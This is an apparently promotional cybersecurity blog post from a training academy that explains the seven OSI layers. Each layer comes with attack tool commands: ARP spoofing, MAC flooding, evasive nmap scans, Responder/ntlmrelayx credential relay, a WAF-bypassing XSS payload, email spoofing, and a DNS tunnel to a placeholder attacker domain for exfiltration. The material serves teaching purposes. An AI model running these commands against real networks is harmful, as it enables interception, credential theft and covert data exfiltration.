Meta Title: OSI Model Explained: All 7 Layers with Real-World Examples
Meta Description: Learn all 7 layers of the OSI model with real-world examples, network tools, and packet analysis techniques used by cybersecurity professionals.
If you have spent any time studying networking or cybersecurity, you have heard the phrase "OSI model" thrown around constantly. It shows up in interviews, certification syllabi, penetration testing reports, and incident response briefings. Yet many practitioners struggle to move beyond a rote memorization of layer names and into a genuine understanding of how traffic actually behaves at each layer and how attackers exploit it.
This post breaks down all seven layers of the OSI (Open Systems Interconnection) model with concrete, real-world examples, practical tooling references, and packet-level detail. By the end, you will be able to map any network attack or defensive control to its correct layer, which is a skill that separates competent practitioners from great ones.
The OSI model is a conceptual framework developed by the International Organization for Standardization (ISO) in 1984. It divides network communication into seven distinct layers, each with a specific responsibility. It was never implemented as a literal protocol stack (that role belongs to TCP/IP), but it remains the universal language for describing how data moves from one application on one machine to an application on another machine.
For cybersecurity professionals, the OSI model is not academic trivia. Every vulnerability, every firewall rule, and every intrusion detection signature targets a specific layer. Understanding this gives you a mental map for threat modeling, tool selection, and log analysis.
Before diving deep, here is the stack from bottom to top:
Traffic flows down the stack on the sending side (encapsulation) and back up on the receiving side (decapsulation). Each layer adds its own header (and sometimes trailer) to the payload from the layer above.
The Physical layer handles the raw transmission of bits across a medium. This includes the electrical signals on copper wire, light pulses in fiber optic cable, and radio waves in Wi-Fi. It is concerned with voltage levels, timing, cable specifications, and connector types.
A network interface card (NIC) operating at 1 Gbps on a Cat6 cable is a Layer 1 concern. So is signal attenuation over a long cable run, or RF interference on a 2.4 GHz wireless channel.
Physical layer attacks are often overlooked in digital-focused training programs. They include passive wiretapping, hardware keyloggers, rogue access points, and destruction of physical media. Optical tap devices placed on fiber runs can silently copy traffic without affecting the signal.
Tools like HackRF One and YARD Stick One operate at this layer, allowing practitioners to analyze and transmit arbitrary radio signals.
The Data Link layer is responsible for node-to-node delivery of frames within a single network segment. It handles MAC addressing, error detection via CRC, and access control to the physical medium. This layer is subdivided into the Logical Link Control (LLC) sublayer and the Media Access Control (MAC) sublayer.
When your laptop sends a packet to your router, it wraps that packet in an Ethernet frame addressed to the router's MAC address. The router strips the frame, reads the IP packet inside, and creates a new frame for the next hop.
Layer 2 is a rich attack surface, particularly inside corporate networks. Common attacks include:
ARP Spoofing allows an attacker to associate their MAC address with the IP address of another host, redirecting traffic through their machine for a man-in-the-middle attack.
# Using arpspoof to intercept traffic between 192.168.1.1 (gateway) and 192.168.1.50 (victim)
arpspoof -i eth0 -t 192.168.1.50 192.168.1.1
arpspoof -i eth0 -t 192.168.1.1 192.168.1.50
[cta]
MAC Flooding overwhelms a switch's CAM table, forcing it to broadcast frames to all ports and behave like a hub.
# macof floods a switch with random MAC addresses
macof -i eth0
[cta]
VLAN Hopping via double tagging or DTP negotiation manipulation allows an attacker to escape their assigned VLAN.
Defending against Layer 2 attacks involves enabling Dynamic ARP Inspection (DAI), port security, and DHCP snooping on managed switches.
The Network layer handles logical addressing and routing. It is responsible for determining the best path for a packet from source to destination across multiple networks. The Internet Protocol (IP), both IPv4 and IPv6, lives here, along with routing protocols such as OSPF, BGP, and EIGRP.
When you send an HTTP request to a web server in another country, your router consults its routing table to determine where to forward the packet. That packet may traverse a dozen routers before reaching its destination. Each router makes a forwarding decision at Layer 3.
Layer 3 attacks include IP spoofing, ICMP-based reconnaissance, and routing protocol manipulation.
Network Scanning with Nmap operates primarily at Layer 3, using raw IP packets to discover hosts and services.
# Host discovery using ICMP echo and TCP SYN probes
nmap -sn -PE -PS22,80,443 192.168.1.0/24
# OS fingerprinting using IP TTL and fragmentation behavior
nmap -O --osscan-guess 192.168.1.100
[cta]
Traceroute leverages the IP TTL field to map the Layer 3 path between two endpoints.
# Using traceroute with TCP SYN probes on port 443 to bypass ICMP filtering
traceroute -T -p 443 target.example.com
[cta]
BGP hijacking, where a malicious autonomous system announces more specific routes to redirect internet traffic, is one of the most impactful real-world Layer 3 attacks. The 2010 China Telecom incident and the 2018 Amazon Route 53 hijacking are well-documented examples.
If you want to build a strong foundation in how these routing protocols work and how adversaries abuse them, the structured learning paths at Redfox Cybersecurity Academy cover network fundamentals through to advanced offensive and defensive techniques.
The Transport layer provides end-to-end communication between processes on different hosts. It is responsible for segmentation, flow control, error correction, and multiplexing via port numbers. The two dominant protocols at this layer are TCP (connection-oriented, reliable) and UDP (connectionless, best-effort).
When your browser connects to a web server, TCP establishes a connection via the three-way handshake (SYN, SYN-ACK, ACK). Port 443 identifies the HTTPS service on the server side. Your browser is assigned an ephemeral port on the client side, typically in the range 49152-65535.
TCP SYN Flooding exploits the three-way handshake by sending many SYN packets without completing the connection, exhausting the server's connection table.
Port Scanning at Layer 4 identifies open services:
# Full TCP connect scan against specific ports
nmap -sT -p 22,80,443,8080,8443 192.168.1.100
# UDP service discovery (slower, requires root)
nmap -sU --top-ports 100 192.168.1.100
[cta]
Firewall evasion using fragmented packets targets stateless packet filters that do not reassemble fragments before applying rules:
# Nmap fragmentation to evade simple packet filters
nmap -f --mtu 8 -sS 192.168.1.100
[cta]
Understanding the TCP state machine is essential for interpreting firewall logs, IDS alerts, and packet captures. The difference between a RST and a FIN/ACK termination, for example, can indicate whether a connection was actively refused or gracefully closed.
The Session layer manages the establishment, maintenance, and termination of sessions between applications. It handles dialog control (who talks when) and synchronization (checkpointing long data transfers so they can resume after interruption). In practice, most session management is handled by application protocols rather than a distinct protocol at this layer.
NetBIOS session establishment, RPC session binding, and SMB session negotiation all operate conceptually at Layer 5. SQL*Net, the Oracle database wire protocol, also manages session state at this layer.
Session hijacking attacks target the identifiers that maintain state across a communication. In the context of network protocols rather than web applications, SMB session relay attacks are a classic example.
Responder captures NTLM authentication attempts and can relay them to other services:
# Run Responder in analyze mode first to observe traffic without responding
responder -I eth0 -A
# Active poisoning of LLMNR/NBT-NS/mDNS to capture NTLMv2 hashes
responder -I eth0 -wrf
[cta]
The captured NTLMv2 hashes can then be cracked offline or relayed using tools like ntlmrelayx to authenticate to other hosts without knowing the plaintext credential.
# Relay captured credentials to a target using impacket's ntlmrelayx
ntlmrelayx.py -tf targets.txt -smb2support -i
[cta]
These techniques are widely used in internal network penetration tests and are covered in depth in the Redfox Cybersecurity Academy practical labs.
The Presentation layer is responsible for data translation, encryption, and compression. It ensures that data sent by the application layer of one system can be read by the application layer of another. It handles character encoding (ASCII, UTF-8, EBCDIC), data serialization formats (XML, JSON, ASN.1), and cryptographic operations.
TLS (Transport Layer Security) is often cited as a Layer 6 concern because it encrypts and decrypts application data before passing it up or down the stack. Character set translation between systems using different encodings also lives here. MIME encoding for email attachments is another practical example.
TLS Configuration Analysis is a core Layer 6 skill. Weak cipher suites, deprecated protocol versions, and certificate validation failures are all Presentation layer vulnerabilities.
# testssl.sh provides comprehensive TLS analysis
testssl.sh --full https://target.example.com
# Check supported ciphers and protocols
testssl.sh --protocols --cipher-per-proto https://target.example.com
[cta]
SSL stripping attacks, where HTTPS is downgraded to HTTP by a man-in-the-middle, exploit weaknesses in how applications handle the transition between encrypted and unencrypted presentation of data.
Encoding-based payload obfuscation also lives at this layer. Attackers frequently use Base64, Unicode escaping, or double URL encoding to bypass signature-based detection:
# Demonstrating how double URL encoding can bypass naive WAF rules
# Original payload: <script>alert(1)</script>
# Single encoded: %3Cscript%3Ealert%281%29%3C%2Fscript%3E
# Double encoded: %253Cscript%253Ealert%25281%2529%253C%252Fscript%253E
echo -n '<script>alert(1)</script>' | python3 -c "import sys, urllib.parse; print(urllib.parse.quote(urllib.parse.quote(sys.stdin.read())))"
[cta]
The Application layer is the topmost layer and the one end users interact with directly. It provides network services to applications and handles protocols like HTTP, HTTPS, DNS, SMTP, FTP, SSH, and SNMP. This layer is not the application itself, but the interface between the application and the network.
When you type a URL into a browser, DNS resolution happens at Layer 7, the HTTP/HTTPS request and response exchange happens at Layer 7, and the web server's virtual hosting logic (deciding which site to serve based on the Host header) happens at Layer 7.
Layer 7 is the most actively attacked layer in modern threat landscapes. Web application attacks, DNS abuse, email-based phishing, and API exploitation all live here.
DNS Reconnaissance using dnsx and subfinder:
# Passive subdomain enumeration using multiple sources
subfinder -d target.example.com -all -recursive -o subdomains.txt
# Active DNS resolution and record enumeration
dnsx -l subdomains.txt -a -aaaa -cname -mx -txt -resp -o resolved.txt
[cta]
HTTP Request Smuggling exploits discrepancies in how front-end and back-end servers parse HTTP/1.1 request boundaries, allowing an attacker to poison the request queue:
# Using smuggler.py to detect HTTP request smuggling vulnerabilities
python3 smuggler.py -u https://target.example.com -l 3
[cta]
DNS Tunneling abuses the DNS protocol to exfiltrate data or maintain C2 communication over a channel that many firewalls permit outbound:
# iodine creates an IP tunnel over DNS
# Server side
iodined -f -c -P secretpassword 10.0.0.1 tunnel.attacker.com
# Client side
iodine -f -P secretpassword tunnel.attacker.com
[cta]
SMTP Header Injection and Phishing Infrastructure Analysis using swaks:
# Test SMTP relay and header handling
swaks --to victim@target.com --from spoofed@legitimate.com \
--server mail.target.com --port 25 \
--header "X-Mailer: Test" \
--body "Layer 7 SMTP test"
[cta]
Practitioners who want to go deep on Layer 7 offensive and defensive techniques, from HTTP deserialization to DNS security extensions (DNSSEC), will find the advanced course catalog at Redfox Cybersecurity Academy covers these topics with hands-on lab environments.
Understanding which layer an attack targets helps you choose the right defensive control. Here is a quick reference mapping:
Layer 1 (Physical): Hardware keyloggers, optical taps, RF jamming, rogue access pointsLayer 2 (Data Link): ARP spoofing, MAC flooding, VLAN hopping, STP manipulationLayer 3 (Network): IP spoofing, ICMP floods, BGP hijacking, route injectionLayer 4 (Transport): SYN floods, TCP session hijacking, port scanning, firewall evasion via fragmentationLayer 5 (Session): SMB relay, RPC abuse, session fixation in legacy protocolsLayer 6 (Presentation): TLS downgrade, SSL stripping, encoding-based WAF bypass, certificate spoofingLayer 7 (Application): SQLi, XSS, HTTP smuggling, DNS tunneling, SMTP abuse, deserialization attacks
A layered defense strategy, often called defense in depth, places controls at multiple layers so that an attacker who bypasses one must still defeat the controls at the next.
Wireshark is the most powerful tool for developing an intuitive understanding of OSI layers because it dissects each frame and labels fields by protocol and layer.
# Capture HTTP traffic and save to file for analysis
tshark -i eth0 -f "tcp port 80" -w http_capture.pcap
# Display filter to isolate ARP traffic (Layer 2)
tshark -r http_capture.pcap -Y "arp"
# Extract HTTP request URIs from capture (Layer 7)
tshark -r http_capture.pcap -Y "http.request" -T fields -e http.host -e http.request.uri
[cta]
Loading the same capture in the Wireshark GUI, you can click on any frame and see the full protocol dissection from the physical frame size down to the application payload, with each layer clearly labeled. This is invaluable for understanding how encapsulation works in practice.
The OSI model is not a dusty academic framework. It is a practical mental model that maps directly onto the tools, attacks, and defenses you use every day as a network security practitioner.
Layer 1 through Layer 4 form the foundational infrastructure that traffic relies on, and attacks at these layers are often low-level, high-impact, and difficult to detect without the right monitoring. Layers 5 through 7 are where most modern application attacks occur, and they require a combination of protocol expertise, code review skills, and behavioral analysis to defend effectively.
Whether you are building detection rules in your SIEM, scoping a penetration test, or preparing for a technical interview, being able to reason accurately about which layer a given behavior belongs to will consistently set your work apart.
If you want to move from conceptual understanding to hands-on proficiency across all seven layers, the structured labs and courses at Redfox Cybersecurity Academy are designed specifically for practitioners who want real skills, not just certificates.
Redfox Cyber Security Inc.
8 The Green, Ste. A, Dover,
Delaware 19901,
United States.
.avif)
